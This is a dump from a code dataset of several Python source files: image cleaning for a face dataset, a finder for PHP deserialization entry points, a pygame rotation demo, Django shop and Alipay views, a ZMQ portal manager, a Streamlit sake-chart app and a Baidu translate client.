{"api_name": "keras.layers.Input", "line_number": 95, "usage_type": "call"}, {"api_name": "keras.layers.embeddings.Embedding", "line_number": 100, "usage_type": "call"}, {"api_name": "keras.layers.embeddings.Embedding", "line_number": 104, "usage_type": "call"}, {"api_name": "keras.layers.merge.concatenate", "line_number": 108, "usage_type": "call"}, {"api_name": "keras.layers.merge.concatenate", "line_number": 114, "usage_type": "call"}, {"api_name": "keras.layers.Conv1D", "line_number": 117, "usage_type": "call"}, {"api_name": "keras.layers.Conv1D", "line_number": 118, "usage_type": "call"}, {"api_name": "keras.layers.Conv1D", "line_number": 119, "usage_type": "call"}, {"api_name": "keras.layers.Conv1D", "line_number": 120, "usage_type": "call"}, {"api_name": "keras.layers.merge.concatenate", "line_number": 122, "usage_type": "call"}, {"api_name": "keras.layers.MaxPooling1D", "line_number": 124, "usage_type": "call"}, {"api_name": "keras.layers.Lambda", "line_number": 128, "usage_type": "call"}, {"api_name": "tensorflow.squeeze", "line_number": 128, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 143, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 147, "usage_type": "call"}, {"api_name": "pretreat.semeval_2010.RELATION_COUNT", "line_number": 147, "usage_type": "argument"}, {"api_name": "keras.regularizers.l2", "line_number": 147, "usage_type": "call"}, {"api_name": "keras.regularizers", "line_number": 147, "usage_type": "attribute"}, {"api_name": "keras.regularizers.l2", "line_number": 148, "usage_type": "call"}, {"api_name": "keras.regularizers", "line_number": 148, "usage_type": "attribute"}, {"api_name": "keras.Model", "line_number": 150, "usage_type": "call"}, {"api_name": "keras.optimizers.Adam", "line_number": 154, "usage_type": "call"}, {"api_name": "keras.callbacks.ModelCheckpoint", "line_number": 166, "usage_type": "call"}, {"api_name": "keras.callbacks.EarlyStopping", "line_number": 167, "usage_type": "call"}]} +{"seq_id": "274313814", "text": "'''Delete error images, revise images's model&format'''\r\n\r\n\r\nimport os\r\nfrom PIL import Image\r\nimport numpy as np\r\n\r\ndef read_txt(txt_path):\r\n names = []\r\n with open(txt_path,\"r\") as f:\r\n for line in f.readlines()[0:]:\r\n pair = line.strip().split()\r\n names.append(pair)\r\n return np.array(names)\r\n\r\ndef loadfiles(filelist):\r\n paths = []\r\n classes = os.listdir(filelist)\r\n for files in classes:\r\n paths.append(filelist + \"/\" + files)\r\n \r\n return np.array(paths)\r\n\r\n\r\n# path_exp = os.path.expanduser(paths)\r\n# classes = os.listdir(path_exp)\r\n# classes.sort()\r\n# nrof_classes = len(classes)\r\n# \r\n## for path in paths.split(':'):\r\n## path_exp = os.path.expanduser(path)\r\n## classes = os.listdir(path_exp)\r\n## classes.sort()\r\n## nrof_classes = len(classes)\r\n# for i in range(nrof_classes):\r\n# class_name = classes[i]\r\n## class_name = classes[1]\r\n# facedir = os.path.join(path_exp, class_name)\r\n# image_paths = get_image_paths(facedir)\r\n# dataset.append(ImageClass(class_name, image_paths))\r\n# \r\n# return dataset\r\n \r\n\r\n\r\n\r\n\r\ndef readimages(path_in):\r\n path_in = path_in + \"/\"\r\n #path_in = 'D:\\\\X\\\\facenet\\\\Generate_AFDB\\\\AFDB\\\\fanglishen\\\\' #输入文件路径\r\n filelist = os.listdir(path_in) # 该文件夹下所有的文件(包括文件夹)\r\n # 遍历所有文件\r\n for files in filelist:\r\n try:\r\n img = Image.open(path_in + files)\r\n # print(img.mode, img.format , files)\r\n\r\n if img.format== \"GIF\" :\r\n img.close()\r\n os.remove(path_in + files)\r\n continue\r\n \r\n if img.format== \"MPO\" :\r\n img.close()\r\n os.remove(path_in + files)\r\n continue\r\n \r\n if (img.size[0]>500)&(img.size[1]>500):\r\n if img.size[0]>img.size[1]:\r\n rate = img.size[0]/500\r\n else:\r\n rate = img.size[1]/500\r\n img_size_1 = int(img.size[0]/rate)\r\n img_size_2 = int(img.size[1]/rate)\r\n img_new = img.resize((img_size_1, img_size_2),Image.ANTIALIAS)\r\n img.close()\r\n os.remove(path_in + files)\r\n img_new.save(path_in + files, format=\"jpeg\")\r\n img = Image.open(path_in + files)\r\n \r\n if (img.mode!=\"RGB\")or(img.format!= \"JPEG\"):\r\n img_new = img.convert(\"RGB\")\r\n img.close()\r\n os.remove(path_in + files)\r\n img_new.save(path_in + files, format=\"jpeg\")\r\n print(\"Renew %s image\" %files)\r\n img = Image.open(path_in + files)\r\n print(img.mode, img.format , files)\r\n img.close()\r\n # print(\"ok\")\r\n\r\n except Exception as e:\r\n print(\"Not an image and delete! \")\r\n try:\r\n img.close()\r\n os.remove(path_in + files)\r\n except Exception as e:\r\n os.remove(path_in + files)\r\n continue\r\n \r\ndef check(path_in):\r\n i=0\r\n path_in = path_in + \"/\"\r\n filelist = os.listdir(path_in) \r\n for files in filelist:\r\n img = Image.open((path_in + files))\r\n i=i+1\r\n \r\n print(\"%s %s %s %s\"%(files, img.mode, img.format,i))\r\n \r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n #txt_path = \"D:/X/facenet/Generate_AFDB/name.txt\"\r\n input_path = \"D:/X/facenet/Generate_AFDB/AFDB\"\r\n names = loadfiles(input_path)\r\n \r\n \r\n \r\n \r\n #names = read_txt(txt_path)\r\n for i in range (len(names)):\r\n print(\"Begin to preread %s\" %names[i])\r\n path_in = names[i]\r\n readimages(path_in)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#\r\n#\r\n#\r\n##输出文件的模式和编号\r\n#print(img.mode, img.name)\r\n#\r\n#\r\n##返回文件下所有文件名列表\r\n#imgs = os.listdir(path_dir)\r\n", "sub_path": "Setup_dataset/choose_images_step_1.py", "file_name": "choose_images_step_1.py", "file_ext": "py", "file_size_in_byte": 4003, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.array", "line_number": 14, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 22, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 51, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 55, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 55, "usage_type": "name"}, {"api_name": "os.remove", "line_number": 60, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 65, "usage_type": "call"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 75, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 75, "usage_type": "name"}, {"api_name": "os.remove", "line_number": 77, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 79, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 79, "usage_type": "name"}, {"api_name": "os.remove", "line_number": 84, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 87, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 87, "usage_type": "name"}, {"api_name": "os.remove", "line_number": 96, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 98, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 104, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 106, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 106, "usage_type": "name"}]} +{"seq_id": "371037845", "text": "#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\n# 找到所有反序列化的入口点函数\n# PHP中反序列化直接的入口点只有__destruct和__wakeup\n\n# from utils.function import findFuncByContent\n\n# def search_startup(files):\n# \tstart_funcs = {}\n# \tstart_funcnames = [\"__destruct\", \"__wakeup\"]\n\n# \tfor filepath in files:\n# \t\tfor funcname in start_funcnames:\n# \t\t\tfor func in findFuncByContent(funcname, files[filepath]):\n# \t\t\t\tstart_funcs[filepath] = func\n# \treturn start_funcs\n\nimport re\nimport sys\nfrom utils.function import findFuncByKeyword\nfrom utils.parser import parsePHPFile\n\ndef search_startup(files):\n rnt = []\n exec_regex = [\n r\"(?:__destruct|__wakeup)\\(\",\n ]\n for filepath in files:\n parser = parsePHPFile(files[filepath], filepath)\n for regex in exec_regex:\n for class_name in parser.keys():\n for func_name in parser[class_name][\"funcs\"]:\n for t in re.compile(regex, re.I).findall(parser[class_name][\"funcs\"][func_name][\"code\"]):\n rnt.append({\"filepath\":filepath, \"func_name\":func_name, \"code\":parser[class_name][\"funcs\"][func_name][\"code\"], \"from\":t})\n return rnt\n", "sub_path": "search/search_startup.py", "file_name": "search_startup.py", "file_ext": "py", "file_size_in_byte": 1190, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "utils.parser.parsePHPFile", "line_number": 30, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 34, "usage_type": "call"}, {"api_name": "re.I", "line_number": 34, "usage_type": "attribute"}]} +{"seq_id": "572723222", "text": "\"\"\" pixel_array11_rotate.py \"\"\"\nimport sys\nfrom math import radians, cos, sin, floor\nimport pygame\nfrom pygame.locals import QUIT\n\npygame.init()\nSURFACE = pygame.display.set_mode((250, 250))\nFPSCLOCK = pygame.time.Clock()\n\ndef process_pixels(src_data, dst_data):\n \"\"\" process pixels \"\"\"\n angle = radians(45)\n sin_v, cos_v = sin(angle), cos(angle)\n\n for ypos in range(250):\n for xpos in range(250):\n pos_x = xpos - 125\n pos_y = ypos - 125\n x_src = floor((pos_x*cos_v - pos_y*sin_v) + 125)\n y_src = floor((pos_x*sin_v + pos_y*cos_v) + 125)\n\n if 0 <= x_src < 250 and 0 <= y_src < 250:\n val = src_data[x_src][y_src]\n rval, gval, bval, _ = SURFACE.unmap_rgb(val)\n dst_data[xpos][ypos] = (rval, gval, bval)\n\ndef main():\n \"\"\" main routine \"\"\"\n src = pygame.image.load(\"picture0.jpg\").convert()\n dst = pygame.Surface((250, 250))\n src_data = pygame.PixelArray(src)\n dst_data = pygame.PixelArray(dst)\n process_pixels(src_data, dst_data)\n del src_data\n del dst_data\n\n while True:\n for _ in pygame.event.get(QUIT):\n pygame.quit()\n sys.exit()\n SURFACE.blit(dst, (0, 0))\n pygame.display.update()\n FPSCLOCK.tick(5)\n\nif __name__ == '__main__':\n main()\n", "sub_path": "PythonMathSamples/pixels/pixel_array11_rotate.py", "file_name": "pixel_array11_rotate.py", "file_ext": "py", "file_size_in_byte": 1335, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pygame.init", "line_number": 7, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 8, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 8, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 9, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 9, "usage_type": "attribute"}, {"api_name": "math.radians", "line_number": 13, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 14, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 14, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 20, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 21, "usage_type": "call"}, {"api_name": "pygame.image.load", "line_number": 30, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 30, "usage_type": "attribute"}, {"api_name": "pygame.Surface", "line_number": 31, "usage_type": "call"}, {"api_name": "pygame.PixelArray", "line_number": 32, "usage_type": "call"}, {"api_name": "pygame.PixelArray", "line_number": 33, "usage_type": "call"}, {"api_name": "pygame.event.get", "line_number": 39, "usage_type": "call"}, {"api_name": "pygame.locals.QUIT", "line_number": 39, "usage_type": "argument"}, {"api_name": "pygame.event", "line_number": 39, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 40, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 41, "usage_type": "call"}, {"api_name": "pygame.display.update", "line_number": 43, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 43, "usage_type": "attribute"}]} +{"seq_id": "209675853", "text": "import datetime\nimport random\n\nfrom django.db import transaction\nfrom django.db.models import F\nfrom django.shortcuts import render, redirect\nfrom django.http import HttpResponseRedirect, HttpResponse, JsonResponse\n# from django_redis.serializers import json\n\nfrom OrangeMall.utils import check_user_login\nimport json\n\nfrom apps.account.models import ShopCar, Order\nfrom apps.home.models import Goods\n\n@check_user_login\ndef submit_cart(request):\n result = {'status': 200, 'msg': 'ok'}\n if request.method == 'POST':\n # 1,如果用户点击结算,获取商品的数量,和购物车表的car_id 先更新数据库\n cars_str = request.POST.get('car')\n cars = json.loads(cars_str)\n for car in cars:\n num = car.get(\"num\")\n car_id = car.get('car_id')\n car = ShopCar.objects.filter(car_id=car_id)\n try:\n if car:\n car.update(count=num)\n except Exception as e:\n print(f'更新购物车数据库出错{e}')\n return JsonResponse(result)\n else:\n # 2,根据car_id查询,新的数据, 图片, 数量, 原价, 现价, 总金额,\n user = request.session.get(\"muser\", None)\n if user:\n car_list = ShopCar.objects.filter(member_id=user.member_id)\n for car in car_list:\n # car.goods_id.img =car.goods_id.goodsdetail_set.filter(goods_id=car.goods_id).values_list('image',flat=True).first()\n car.goods_id.img = Goods.objects.filter(goods_id=car.goods_id.goods_id).first().goodsdetail.image\n car.goods_id.origin_price = car.goods_id.goodsspu_set.filter(goods_id=car.goods_id).values_list(\n 'origin_price', flat=True).first()\n car.goods_id.goods_price = car.goods_id.goodsspu_set.filter(goods_id=car.goods_id).values_list(\n 'goods_price', flat=True).first()\n car.goods_id.allprice = int(car.count) * int(car.goods_id.goods_price)\n print(car.goods_id.img)\n print(car.goods_id.origin_price)\n print(car.goods_id.goods_price)\n print(car.goods_id.allprice)\n print('结算页面展示')\n return render(request, 'cart/pay.html', context={'car_list': car_list})\n # return render(request,'cart/pay.html')\n\ndef submit_order(request):\n\n return render(request,'cart/pay.html')\n\n\n# 生成订单信息\ndef product_order(request, cars):\n # 第一步生成订单号 全站必须唯一 尽量大于8位\n member_id = request.session.get(\"muser\",None).member_id\n order_code = f\"{datetime.datetime.now().strftime('%Y%m%d%H%M%S')}{random.randint(100000,999999)}\"\n order = Order(order_id=order_code, member_id=member_id)\n order.save()\n return order.order_id\n\n\ndef pay_success(request):\n return render(request, 'cart/success.html')\n\n\nfrom alipay import AliPay\nfrom OrangeMall import settings\ndef pay(request):\n\n # 1,点击立即购买, 发起ajax请求,到此视图函数---> 将商品数量,商品id,用户id ,生成订单号 存入到 订单表\n # 2,连表查询获取商品的单价,数量并根据 总价, 订单号,发去收款\n alipay = AliPay(\n appid=settings.AAP_ID,\n app_notify_url=None,\n app_private_key_string=settings.APP_PRIVATE_STRING,\n alipay_public_key_string= settings.APP_PUBLIC_STRING,\n # 坑点1\n sign_type=\"RSA2\",\n debug= True\n )\n order_string = alipay.api_alipay_trade_page_pay(\n # 订单号 每次付款时保证订单号唯一 否则会出现 : 订单信息有错误,建议重新下单后付款。 错误码:CONTEXT_INCONSISTENT\n out_trade_no='123451',\n # 商品总价\n total_amount='0.01', # 将Decimal类型转换为字符串交给支付宝\n # 订单标题\n subject=\"悦桔商城-{}\".format(9527),\n # 支付成功之后 前端跳转的界面\n return_url='https://baidu.com/',\n # 支付成功后台跳转接口\n notify_url=None # 可选, 不填则使用默认notify url\n )\n # 让用户进行支付的支付宝页面网址\n url = settings.ALI_PAY_URL + \"?\" + order_string\n # 坑点2 路由设置不要设置为主页\n return redirect(url)\n\n\n\n# 点击立即购买---> 将商品数量,商品id,用户id ,生成订单号 存入到 订单表---->", "sub_path": "apps/order/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 4388, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "json.loads", "line_number": 22, "usage_type": "call"}, {"api_name": "apps.account.models.ShopCar.objects.filter", "line_number": 26, "usage_type": "call"}, {"api_name": "apps.account.models.ShopCar.objects", "line_number": 26, "usage_type": "attribute"}, {"api_name": "apps.account.models.ShopCar", "line_number": 26, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 32, "usage_type": "call"}, {"api_name": "apps.account.models.ShopCar.objects.filter", "line_number": 37, "usage_type": "call"}, {"api_name": "apps.account.models.ShopCar.objects", "line_number": 37, "usage_type": "attribute"}, {"api_name": "apps.account.models.ShopCar", "line_number": 37, "usage_type": "name"}, {"api_name": "apps.home.models.Goods.objects.filter", "line_number": 40, "usage_type": "call"}, {"api_name": "apps.home.models.Goods.objects", "line_number": 40, "usage_type": "attribute"}, {"api_name": "apps.home.models.Goods", "line_number": 40, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 51, "usage_type": "call"}, {"api_name": "OrangeMall.utils.check_user_login", "line_number": 16, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 56, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 63, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 63, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 63, "usage_type": "call"}, {"api_name": "apps.account.models.Order", "line_number": 64, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 70, "usage_type": "call"}, {"api_name": "alipay.AliPay", "line_number": 79, "usage_type": "call"}, {"api_name": "OrangeMall.settings.AAP_ID", "line_number": 80, "usage_type": "attribute"}, {"api_name": "OrangeMall.settings", "line_number": 80, "usage_type": "name"}, {"api_name": "OrangeMall.settings.APP_PRIVATE_STRING", "line_number": 82, "usage_type": "attribute"}, {"api_name": "OrangeMall.settings", "line_number": 82, "usage_type": "name"}, {"api_name": "OrangeMall.settings.APP_PUBLIC_STRING", "line_number": 83, "usage_type": "attribute"}, {"api_name": "OrangeMall.settings", "line_number": 83, "usage_type": "name"}, {"api_name": "alipay.api_alipay_trade_page_pay", "line_number": 88, "usage_type": "call"}, {"api_name": "OrangeMall.settings.ALI_PAY_URL", "line_number": 101, "usage_type": "attribute"}, {"api_name": "OrangeMall.settings", "line_number": 101, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 103, "usage_type": "call"}]} +{"seq_id": "321085723", "text": "#!/usr/bin/env python2.7\n# encoding: utf-8\n# Copyright (c) 2016 Dilusense Inc. All Rights Reserved.\nimport logging\nfrom msg_trans import ZMQPort\nfrom msg_trans.thread_subs_msg import SubsMsgServer\nfrom services.msg_center.zmq_msg_connections import ZMQConns\nfrom utils.global_info import GlobalInfo\nfrom utils.my_constant import MyConstant\nfrom utils.regular_expression import Regular\nfrom utils.serialize_utils import SerializeUtils\n\n\nclass PortalMsgManager(object):\n\n @staticmethod\n def add_new_conn(ip):\n if Regular.verify_ip(ip):\n sms = SubsMsgServer(ip, ZMQPort.SUBS)\n sms.start()\n if sms.isAlive():\n ZMQConns().put(ip, sms)\n else:\n logging.getLogger(GlobalInfo.logger_main).info('ip: ' + ip + ' is unlawful can not connect to server')\n\n\n @staticmethod\n def init_portals():\n ips = SerializeUtils.get(MyConstant.portal_ips_serialize_data_key)\n if ips is None:\n logging.getLogger(GlobalInfo.logger_main).info('no ip to init zmq conn')\n return\n ips = set(ips)\n for ip in ips:\n PortalMsgManager.add_new_conn(ip)\n\n\n @staticmethod\n def update_portals(ips):\n smss = ZMQConns().get_all()\n sms_keys = ([])\n ip_keys = ([])\n\n if type(ips) == dict:\n ip_keys_store = {}\n elif type(ips) == list:\n ip_keys_store = []\n else:\n raise NameError('parameter of this method must be dict or list')\n\n try:\n ip_keys = set(ips)\n except:\n pass\n try:\n sms_keys = set(smss)\n except:\n pass\n\n new_ips = ip_keys - sms_keys\n old_ips = sms_keys - ip_keys\n intersection_ips = ip_keys & sms_keys\n\n for ip_key in ip_keys:\n if type(ips) == dict:\n ip_keys_store[ip_key] = ips[ip_key]\n else:\n ip_keys_store.append(ip_key)\n\n\n for ip in intersection_ips:\n logging.getLogger(GlobalInfo.logger_main).info('portal of ip: ' + ip + ' msg passageway is already exits')\n\n for ip in old_ips:\n if ZMQConns().get(ip) is not None:\n ZMQConns().get(ip).run_flag = False\n ZMQConns().remove(ip)\n\n for ip in new_ips:\n PortalMsgManager.add_new_conn(ip)\n\n SerializeUtils.update(MyConstant.portal_ips_serialize_data_key, ip_keys_store)\n\n", "sub_path": "backend/src/app/services/msg_center/portal_msg_manager.py", "file_name": "portal_msg_manager.py", "file_ext": "py", "file_size_in_byte": 2451, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "utils.regular_expression.Regular.verify_ip", "line_number": 18, "usage_type": "call"}, {"api_name": "utils.regular_expression.Regular", "line_number": 18, "usage_type": "name"}, {"api_name": "msg_trans.thread_subs_msg.SubsMsgServer", "line_number": 19, "usage_type": "call"}, {"api_name": "msg_trans.ZMQPort.SUBS", "line_number": 19, "usage_type": "attribute"}, {"api_name": "msg_trans.ZMQPort", "line_number": 19, "usage_type": "name"}, {"api_name": "services.msg_center.zmq_msg_connections.ZMQConns", "line_number": 22, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 24, "usage_type": "call"}, {"api_name": "utils.global_info.GlobalInfo.logger_main", "line_number": 24, "usage_type": "attribute"}, {"api_name": "utils.global_info.GlobalInfo", "line_number": 24, "usage_type": "name"}, {"api_name": "utils.serialize_utils.SerializeUtils.get", "line_number": 29, "usage_type": "call"}, {"api_name": "utils.serialize_utils.SerializeUtils", "line_number": 29, "usage_type": "name"}, {"api_name": "utils.my_constant.MyConstant.portal_ips_serialize_data_key", "line_number": 29, "usage_type": "attribute"}, {"api_name": "utils.my_constant.MyConstant", "line_number": 29, "usage_type": "name"}, {"api_name": "logging.getLogger", "line_number": 31, "usage_type": "call"}, {"api_name": "utils.global_info.GlobalInfo.logger_main", "line_number": 31, "usage_type": "attribute"}, {"api_name": "utils.global_info.GlobalInfo", "line_number": 31, "usage_type": "name"}, {"api_name": "services.msg_center.zmq_msg_connections.ZMQConns", "line_number": 40, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 72, "usage_type": "call"}, {"api_name": "utils.global_info.GlobalInfo.logger_main", "line_number": 72, "usage_type": "attribute"}, {"api_name": "utils.global_info.GlobalInfo", "line_number": 72, "usage_type": "name"}, {"api_name": "services.msg_center.zmq_msg_connections.ZMQConns", "line_number": 75, "usage_type": "call"}, {"api_name": "services.msg_center.zmq_msg_connections.ZMQConns", "line_number": 76, "usage_type": "call"}, {"api_name": "services.msg_center.zmq_msg_connections.ZMQConns", "line_number": 77, "usage_type": "call"}, {"api_name": "utils.serialize_utils.SerializeUtils.update", "line_number": 82, "usage_type": "call"}, {"api_name": "utils.serialize_utils.SerializeUtils", "line_number": 82, "usage_type": "name"}, {"api_name": "utils.my_constant.MyConstant.portal_ips_serialize_data_key", "line_number": 82, "usage_type": "attribute"}, {"api_name": "utils.my_constant.MyConstant", "line_number": 82, "usage_type": "name"}]} +{"seq_id": "578693453", "text": "import pandas as pd\n# import numpy as np\nimport requests\nimport json\nimport streamlit as st\nimport plotly.express as px\n\n\n# markdownで文章が書ける\nst.markdown('# 簡単日本酒アプリ')\nst.markdown('[さけのわAPI](https://sakenowa.com)のデータを表示しています:')\n\n# エンドポイント\nurls = {\n \"地域一覧\": \"https://muro.sakenowa.com/sakenowa-data/api/areas\",\n \"銘柄一覧\": \"https://muro.sakenowa.com/sakenowa-data/api/brands\",\n \"蔵元一覧\": \"https://muro.sakenowa.com/sakenowa-data/api/breweries\",\n \"ランキング\": \"https://muro.sakenowa.com/sakenowa-data/api/rankings\",\n \"フレーバーチャート\": \"https://muro.sakenowa.com/sakenowa-data/api/flavor-charts\",\n \"フレーバータグ\": \"https://muro.sakenowa.com/sakenowa-data/api/flavor-tags\",\n \"銘柄ごとフレーバータグ\": \"https://muro.sakenowa.com/sakenowa-data/api/brand-flavor-tags\",\n }\n\n # 地域名を取得\nareas_response = requests.get(urls.get(\"地域一覧\")).json()\nareas = [area[\"name\"] for area in areas_response[\"areas\"]]\nselect_areas = st.sidebar.selectbox(\"好きな地域を選んでください\", areas)\n\n# 地域IDを取得\nareaId = [area[\"id\"] for area in areas_response[\"areas\"] if area[\"name\"]==select_areas][0]\n\n# 蔵元名を取得\nbreweries_response = requests.get(urls.get(\"蔵元一覧\")).json()\nbreweries = [breweries[\"name\"] for breweries in breweries_response[\"breweries\"] if breweries[\"areaId\"]==areaId]\nselect_breweries = st.sidebar.selectbox(\"好きな蔵元を選んでください\", breweries)\n\n# 蔵元IDを取得\nbreweryId = [breweries[\"id\"] for breweries in breweries_response[\"breweries\"] if breweries[\"name\"]==select_breweries][0]\n\n# 銘柄名を取得\nbrands_response = requests.get(urls.get(\"銘柄一覧\")).json()\nbrands = [brands[\"name\"] for brands in brands_response[\"brands\"] if brands[\"breweryId\"]==breweryId]\nselect_brands = st.sidebar.selectbox(\"好きな銘柄を選んでください\", brands)\n\n# 銘柄IDを取得\nbrandId = [brands[\"id\"] for brands in brands_response[\"brands\"] if brands[\"name\"]==select_brands][0]\n\n# フレーバーチャートを取得\nflavor_charts_response = requests.get(urls.get(\"フレーバーチャート\")).json()\nflavor_charts = [flavor_charts for flavor_charts in flavor_charts_response[\"flavorCharts\"] if flavor_charts[\"brandId\"]==brandId]\n\n# plotlyでレーダーチャートを表示\nst.markdown(f'## {select_brands}のフレーバーチャート')\n\ntry:\n df = pd.DataFrame(flavor_charts)\n df = df.drop('brandId', axis=1)\n # 見やすくするためにカラム名を変更、その後plotlyで読み込めるようにデータを転置\n df = df.rename(columns={'f1':'華やか', 'f2':'芳醇', 'f3':'重厚', 'f4':'穏やか', 'f5':'ドライ', 'f6':'軽快'}).T\n fig = px.line_polar(df, r=df[0], theta=df.index, line_close=True, range_r=[0,1])\n st.plotly_chart(fig)\n \n# フレーバーチャートのデータがないものもあるので例外処理\nexcept:\n st.markdown('## この銘柄はフレーバーチャートを表示できません!!')\n\n", "sub_path": "sake.py", "file_name": "sake.py", "file_ext": "py", "file_size_in_byte": 3093, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "streamlit.markdown", "line_number": 10, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 11, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 25, "usage_type": "call"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 27, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 27, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 33, "usage_type": "call"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 35, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 35, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 41, "usage_type": "call"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 43, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 43, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 49, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 53, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 56, "usage_type": "call"}, {"api_name": "plotly.express.line_polar", "line_number": 60, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 60, "usage_type": "name"}, {"api_name": "streamlit.plotly_chart", "line_number": 61, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 65, "usage_type": "call"}]} +{"seq_id": "172257022", "text": "import requests\nimport json\n\n\nclass BaiduTrans:\n def __init__(self, trans_str):\n self.trans_str = trans_str\n self.lang_detect_url = \"https://fanyi.baidu.com/langdetect\"\n self.headers = {\"User-Agent\": \"Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Mobile Safari/537.36\"}\n self.trans_url = \"https://fanyi.baidu.com/basetrans\"\n\n def parse_url(self, url, data):\n res = requests.post(url, data=data, headers=self.headers)\n return json.loads(res.content.decode())\n\n def get_res(self, dict_res):\n res = dict_res[\"trans\"][0][\"dst\"]\n print(\"结果:\", res)\n\n def run(self):\n lang_detect_data = {\"query\": self.trans_str}\n # 获取语言类型\n lang = self.parse_url(self.lang_detect_url, lang_detect_data)[\"lan\"]\n # 准备post数据\n trans_data = {\"query\": self.trans_str, \"from\":\"zh\", \"to\":\"en\"} if lang==\"zh\" else {\"query\": self.trans_str, \"from\":\"en\", \"to\":\"zh\"}\n dict_res = self.parse_url(self.trans_url, trans_data)\n self.get_res(dict_res)\n\n\ndef main():\n my_str = input(\"输入:\")\n bf = BaiduTrans(my_str)\n bf.run()\n\n\nif __name__ == '__main__':\n main()\n", "sub_path": "spider/baidu_fanyi.py", "file_name": "baidu_fanyi.py", "file_ext": "py", "file_size_in_byte": 1249, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "requests.post", "line_number": 13, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 14, "usage_type": "call"}]} +{"seq_id": "1478513", "text": "from os import name\nfrom django.conf import settings\nfrom django.urls import path,re_path\nfrom . import views\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n path('',views.index,name='home'),\n path('upload/image/',views.upload_post,name='NewPost'),\n path('update/',views.update_profile,name='UpdateProfile'),\n re_path('like/(?P\\d+)',views.like_post,name='LikePost'),\n path('create_profile/',views.create_profile,name='create_profile'),\n re_path('comment/(?P\\d+)',views.comment,name='AddComment'),\n re_path('profile/(?P\\d+)',views.profile,name='profile'),\n path('search/',views.search,name='Search'),\n path('email/',views.welcome_mail,name='email'),\n re_path('single/(?P\\d+)',views.single_post,name='single-post')\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)", "sub_path": "insta/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 878, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": 